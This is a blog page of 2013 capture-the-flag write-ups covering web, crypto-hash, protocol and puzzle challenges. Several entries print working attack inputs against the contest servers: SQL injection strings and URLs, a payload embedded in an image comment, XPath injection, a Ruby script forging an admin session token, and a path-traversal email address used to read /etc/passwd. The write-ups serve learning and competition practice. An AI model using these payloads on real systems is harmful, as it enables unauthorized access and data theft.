A disturbing lack of taste. Just another WordPress site

22Jul/130

UFO CTF 2013 – Web300 Writeup

The challenge is a site with SSL support for both mobile version and the computer one. There is a registration form where once you logged in you can set a device to attach and put on your "secret". Obviously the target was to log in as admin or in somehow get his secret. The challenge provide an Andriod application (SecureSpaceAuth.apk). After installing it and testing a bit I managed to see what HTTP request it was doing by pointing the DNS of the site's challenge site to my webserver. With a logger a saw two insteresting one:

https://spaceauth.tasks.ufoctf.ru/?act=attach2&username=&password=&device=

https://spaceauth.tasks.ufoctf.ru/?act=auth2&username=&key=&device=

The first one attache a new device given the username and the password and the second one complete the auth process. After testing a bit I got that device parameter where vulnerable by SQL injection and also the error report that its running within an update query. So basically with this SQL we can set us as admin:

https://spaceauth.tasks.ufoctf.ru/?act=attach2&username=kappa&password=kappa1&device=dvpro',admin=1;%23

But first we have to create the new device:

https://spaceauth.tasks.ufoctf.ru/?act=attach2&username=kappa&password=kappa&device=dvpro

and then authenticate us

https://spaceauth.tasks.ufoctf.ru/?act=auth2&username=kappa&key=39b7b&device=dvpro

The important thing to keep in mind is that we have to do all this stesp using a crafted UuserAgent simulating an Android system because this request will be accepted only from mobile device because this queries is coded by running under this circumstances.

Now just log in with your account and get the admin secret.

Razor4x

Filed under: Uncategorized No Comments
22Jul/130

UFO CTF 2013 – Web100 Writeup

The challenge was made by 3 auth levels where the aim is bypass them through SQLi and the annonying thing of this challenge is that no feedback is provided about your query so you have to guess the most common mistake till you find the right one..

First auth.

The first one is as easy as tricky beacuse it was a OR injection but the strings are included within double-quotes and not with singles quotes so a classic ' OR '1'='1 won't work. Use instead " OR "1"="1.  Now that you have bypassed auth1 you have also to pickup the right password of "admin1" user blindly. In this case a regular BSQLi with substr() + ascii() will work.

Second auth.

Now that you have the password for auth1 we can move on auth2. This time the things getting a little bit harder but still remain an easy chall. The hardest part was to understand that we are playing with a LIKE query with almost everything filterd but with LIKE statemant we can make it true by using wildcards as %, this will match every char. So the POST query would be like this:

username=admin1&level1_password=MyPasswordIsNotTheFlag&level2_password=%

But same as in auth1 we have to find the password of auth2. How? I coded a script to do this: http://pastebin.com/UPDwMFDw.

Third auth.

Last auth, finally! In this auth some feedback has been provided so it was very easy to solve infact you have two password to input (apart those about auth1,auth2) and must be equal else an error will pop up. If we input a random password we'll see error like ..query failed : password3.1 password3.2 means both have failed but if we input: ' or '1'='1 we'll see error like ..query failed : password3.2 means password3.1 has been executed correctly. So basically our true/false condition on BSQLi is based on the presence of "password3.1" error. An equal code for get the password as the previous one is this: http://pastebin.com/gQvQy1c0

Now just log in and get the flag.

Razor4x

 

Filed under: Uncategorized No Comments
22Jul/130

UFO CTF 2013 – Web75 Writeup

The challenge gave us this link:

http://uploader.earth.tasks.ufoctf.ru/?fileid=dcfd9cbaee181d457598465297b662814d19cff1

Inside this you find the download link of the requested file and the chiper used to encrypt it and other fields. At first glance the vulnerability could be a LFI or a SQLi but looking further through the download link:

http://uploader.earth.tasks.ufoctf.ru/secret_uploads/dcfd9cbaee181d457598465297b662814d19cff1/TopSecret_Report_For_You_MrLOL.txt

you can see the path where the file is. So now as you may guessed the vulnerability was HTTP indexing basically. Infact you can browse the directories easly and after that I found and interesting file uploader.earth.tasks.ufoctf.ru/secret_uploads/f6140944d4fa3976ef04f81792d2c88562872a2d/Mr.LOL_earth.documents.zip

Now there is another problem: the aes-cbc-256 encryption of the text. Inside every directory there is a file called ._secret where inside this you can find the key to decrypt the content of the file. So now its a cake:

openssl enc -d -aes-256-cbc -in Mr.LOL_earth.documents.zip -out a.zip

Now just unzip and open the image to see flag...

Razor4x

Filed under: Uncategorized No Comments
19Jul/130

DIMVA CTF 2013 – Web200 Writeup

When I went to the challenge page the script complained about missing parameters (user and password missing xml parameter). So we tryed adding ?xml=<login><user>YmxhaA==</user><password>YmxhaA==</password><login> (user and password must be base64 encoded) and an authetication error came out. After some testing a Xpath injection has been revealed in password parameter(may be also in user, didn't test it). No chance to get the password with concatenating the queries so we must go blind. This is the script I used to extract flag:

http://pastebin.com/Vp4fxy3T

The //User/ReportURL field was taken in /users.xml~ file (when you logged in successfully an HTML comment inform you about its existance).

 

Razor4x

Filed under: Uncategorized No Comments
19Jul/130

DIMVA CTF 2013 – Trivia50 (II) Writeup

This trivia wanted that our input hashed with an "unkown" method must starts this string:"1000000". Also the first chars of our hashed input is provided, for example the hash of 123 is "4f68465". Detecting the hash algorithm was extremely easy, infact we can check all the hasing methods supported with hash_algos() and see who with input "123" return "4f68465":

<?php
$arr=hash_algos();
for($i=0;$i<count($arr);$i++){
    if(preg_match('/^4f68465/', hash($arr[$i],"123")))
        echo $arr[$i]."\n";
}
?>

The returned "salsa20". Knowing this we can now just set up a bruteforce script to catch wich string starts with "1000000":

<?php
for($i=1;$i<9999999000;$i++){
   if(preg_match('/^1000000/', hash("salsa20",$i)))  
        echo $i."::::::::".hash("salsa20",$i)."\n";
}
?>

The number was 460825513.

Razor4x

 

Filed under: Uncategorized No Comments
19Jul/130

DIMVA CTF 2013 – Web100 Writeup

The site give us an image uploader where you can add your photos (only JPG images is accepted) in a gallery(one per team). The vulnerability was very easy to exploit: when you upload the image the script take its comment (if doesnt exist it dies with a error) and insert it into a SQL Lite database.

So just download exiv2 and run:

$exiv2 -c "' union select password from pictures-- -" index4 

Then upload it and get flag.

Razor4x

Filed under: Uncategorized No Comments
7Jul/130

SIGINTCTF 2013 – PROtocol Writeup

In this challenge we have to connect to the server but instead using TCP as transport protocol the server used SCTP. So after connecting to it a wierd output has been provided. You could easly understand that was the flag but every chars has changed his position getting the flag shuffled. Analyzing the traffic with tshark I saw that the chars' original position was taken by the SID of their data chunk, for example:

-- DATA CHUNK --

...

SID=0x0005

...

Value='N'

This means that char N was at 5th place in the original string. Filtering the SID with tshark is easy:

tshark -R "sctp" -Tfields -e "sctp.data_sid"

Running this while you ar connecting to the server will give you the SID that tshark has obtained. Now we have the SIDs and their corrisponding value (server's output) now just reconstruct the string with this little perl script:

#!/usr/bin/perl
@int=(0x0058,0x0020,0x003e,0x0013,0x0019,0x0065,0x005f,0x000d,0x0023,0x005e,0x0007,0x004d,0x0012,0x0040,0x000a,0x0039,0x0068,0x0064,0x0046,0x0003,0x002a,0x003c,0x003a,0x0022,0x0063,0x0052,0x0053,0x0034,0x0038,0x002c,0x0018,0x002d,0x0044,0x0001,0x003b,0x0055,0x0042,0x0035,0x005b,0x0056,0x002f,0x0009,0x0043,0x0036,0x0024,0x0067,0x0054,0x001d,0x001e,0x003d,0x0021,0x0016,0x0059,0x0029,0x0032,0x0027,0x004f,0x0069,0x0066,0x0062,0x002b,0x0017,0x0002,0x005c,0x004c,0x0050,0x0051,0x0006,0x0026,0x004a,0x0008,0x0060,0x000f,0x0011,0x001f,0x002e,0x0030,0x003f,0x0047,0x004e,0x0049,0x0048,0x0041,0x005d,0x0004,0x000c,0x0037,0x005a,0x006a,0x0028,0x0057,0x001a,0x0045,0x0015,0x0010,0x0014,0x004b,0x0031,0x0025,0x0000,0x0033,0x001c,0x001b,0x0061,0x000b,0x000e,0x0005);
$str="5cdcf96950d5ec32538I47c3f7a359315Ie0a2045118afc61ff38a92dc24d0Gd029_2b93a6c762abd89eN8dbdd71dcfda0bSbec524T";
@crap=split //,$str;
for($i=0;$i<=$#int;$i++){
    for($j=0;$j<=$#int;$j++){
        if($i==$int[$j]){
            print $crap[$j];
        }
    }    
}
print "\n";

Razor4x

Filed under: Uncategorized No Comments
7Jul/130

SIGINT CTF 2013 – notes Writeup

Another challenge from SIGINT CTF. The organizers give to us the sourecode of this little CMS where, after a registration, you can create a message that only you and the admin can see. The aim of this one was to login as admin and read his secret (flag). After login with mine account I see that 3 cookies has been created: login_time, login_token and login_name. Well, login_time is as self-explanatory as login_name but login_token isn't. This is a piece of code that may help you to understand how it is generated:

web.ru

login_token= user.login_token(login_time)

user.rb

        def login_token(salt)
            check_authorized
            password_data= Data.new(@user_dir+"password_hash")
            password_data.readlock do
                Digest::SHA256.hexdigest(password_data.read+salt)
            end
        end

So login_token take the the time has seed. In login_token function we see another variable initialized that is password_data. As you may understand its a file (source/data/users/<user>/password_hash) containing a string: $2a$13$ntsVS46ekclCQRIO45a1oOgpZy6asmxAfP0ko3d8G4H1LsGVcEQ0O

This one is from admin user that concatenated with the salt(login_time) and SHA256'd gives the login_token. So generating one that fit to admin is extremely easy. Just took the good login_time from your cookies after logged in with your account and put it in this piece of code:

#!/usr/bin/ruby

require "digest"
password_data="$2a$13$ntsVS46ekclCQRIO45a1oOgpZy6asmxAfP0ko3d8G4H1LsGVcEQ0O"
salt="1373119012"
login_token = Digest::SHA256.hexdigest(password_data+salt)
puts login_token

and it will give you the login_token. Now replace it with the older one setting login_name as admin and you'll be him.

Razor4x

Filed under: Uncategorized No Comments
7Jul/130

SIGINT CTF 2013 – mail Writeup

The challenge give you a mail with an archive as attachment encoded in base64. After decode it and extract it a ruby file popped out. Analyzing it the script is a kind of shell where the commands are sended by email's field subject. You can signup your account (in this case a proper folder will be created), get your files inside your account, share files with other, create files, ecc... In these last cases the input were hard-filtered by regex so that you can input only alphanum chars. All filtered except the signup form. The vulnerability was very easy to find and exploit: since during signup the source mail weren't filtered we could point our home directory to another one like this

asdasd/../../../../[email protected]

So now we basically pointed our home directory to /etc with asdasd/../../../../[email protected] account name (a fake mailer was used to accomplish this). Now create a new message with previous account where subject is: share passwd [email protected]  Now just enter in [email protected] mail and get passwd for pick up the flag.

Razor4x

Filed under: Uncategorized No Comments
5Jul/130

DEF CON CTF Qualifier 2013 – OGMCMA1 Writeup

The task was to solve 50 times the 8-puzzle game within a few time. Once you connected the 8-puzzle scheme will be disclosed so you have to code a parser for fit it into a proper structure and obviusly the game solver. I took the last one here: http://brandon.sternefamily.net/files/8-puzzle.txt and coded a parser by my self and tryed to found a way to solve it as faster as possible. I discovered later that you could also move the numbers with "l,u,r,d" and not only with left,right ecc.. with advantage that you can concatenate them and so solve it in one shot.

Here is the code: http://pastebin.com/zrUxPtQj

Razor4x

Filed under: Uncategorized No Comments